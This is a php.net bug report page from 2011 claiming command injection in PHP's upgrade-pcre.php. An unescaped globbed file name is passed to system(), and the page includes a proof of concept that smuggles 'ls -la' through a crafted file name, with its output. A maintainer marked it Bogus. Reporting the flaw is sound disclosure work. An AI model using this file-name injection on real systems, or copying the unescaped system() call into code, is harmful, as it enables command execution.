|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2011-09-05 18:29 UTC] scottmac@php.net
-Status: Open
+Status: Bogus
[2011-09-05 18:29 UTC] scottmac@php.net
[2011-09-06 04:37 UTC] thinhhq at vng dot com dot vn
[2011-09-06 04:51 UTC] scottmac@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat May 04 05:01:30 2024 UTC |
Description: ------------ Description: Command injection flaw found in /php-5.3.8/ext/pcre/upgrade-pcre.php: -----snip snip ------ $pattern = 'pcre-*.tar.*'; $newpcre = glob($pattern); if (count($newpcre) > 1) { echo "more than one '$pattern' file. aborting\n"; print_r($newpcre); exit;} if (count($newpcre) == 0) { die("need one '$pattern' file. aborting.\n"); } $newpcre = $newpcre[0]; if (strpos($newpcre, 'gz')) { system("tar xfz $newpcre"); //command injection } elseif (strpos($newpcre, 'bz2')) { system("tar xfj $newpcre");//command injection } else { die("file type not recognized: $newpcre\n"); -----snip snip ------ Test script: --------------- PoC: $touch "pcre-PoC.tar.gz|ls -la" $ php upgrade-pcre.php tar: pcre-PoC.tar.gz: Cannot open: No such file or directory tar: Error is not recoverable: exiting now tar: Child returned status 2 tar: Exiting with failure status due to previous errors total 100 drwxr-xr-x 4 g4mm4 g4mm4 4096 2011-09-05 12:37 . drwxr-xr-x 79 g4mm4 g4mm4 4096 2011-08-23 05:33 .. -rw-r--r-- 1 g4mm4 g4mm4 2764 2009-08-11 17:40 config0.m4 -rw-r--r-- 1 g4mm4 g4mm4 714 2010-12-13 13:43 config.w32 -rw-r--r-- 1 g4mm4 g4mm4 40 2007-09-26 11:44 CREDITS drwxr-xr-x 4 g4mm4 g4mm4 4096 2011-08-23 05:32 pcrelib -rw-r--r-- 1 g4mm4 g4mm4 0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la -rw-r--r-- 1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c -rw-r--r-- 1 g4mm4 g4mm4 212 2009-01-11 08:59 php_pcre.def -rw-r--r-- 1 g4mm4 g4mm4 3280 2010-12-31 21:19 php_pcre.h drwxr-xr-x 2 g4mm4 g4mm4 4096 2011-08-23 05:32 tests -rw-r--r-- 1 g4mm4 g4mm4 2876 2011-05-13 03:00 upgrade-pcre.php processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more Expected result: ---------------- $ php upgrade-pcre.php gzip: stdin: unexpected end of file tar: Child returned status 1 tar: Exiting with failure status due to previous errors processing pcrelib/AUTHORS... pcre-dsada/AUTHORS is not available any more Actual result: -------------- tar: pcre-PoC.tar.gz: Cannot open: No such file or directory tar: Error is not recoverable: exiting now tar: Child returned status 2 tar: Exiting with failure status due to previous errors total 100 drwxr-xr-x 4 g4mm4 g4mm4 4096 2011-09-05 12:37 . drwxr-xr-x 79 g4mm4 g4mm4 4096 2011-08-23 05:33 .. -rw-r--r-- 1 g4mm4 g4mm4 2764 2009-08-11 17:40 config0.m4 -rw-r--r-- 1 g4mm4 g4mm4 714 2010-12-13 13:43 config.w32 -rw-r--r-- 1 g4mm4 g4mm4 40 2007-09-26 11:44 CREDITS drwxr-xr-x 4 g4mm4 g4mm4 4096 2011-08-23 05:32 pcrelib -rw-r--r-- 1 g4mm4 g4mm4 0 2011-09-05 12:37 pcre-PoC.tar.gz|ls -la -rw-r--r-- 1 g4mm4 g4mm4 59989 2011-08-05 18:39 php_pcre.c -rw-r--r-- 1 g4mm4 g4mm4 212 2009-01-11 08:59 php_pcre.def -rw-r--r-- 1 g4mm4 g4mm4 3280 2010-12-31 21:19 php_pcre.h drwxr-xr-x 2 g4mm4 g4mm4 4096 2011-08-23 05:32 tests -rw-r--r-- 1 g4mm4 g4mm4 2876 2011-05-13 03:00 upgrade-pcre.php processing pcrelib/AUTHORS... pcre-PoC/AUTHORS is not available any more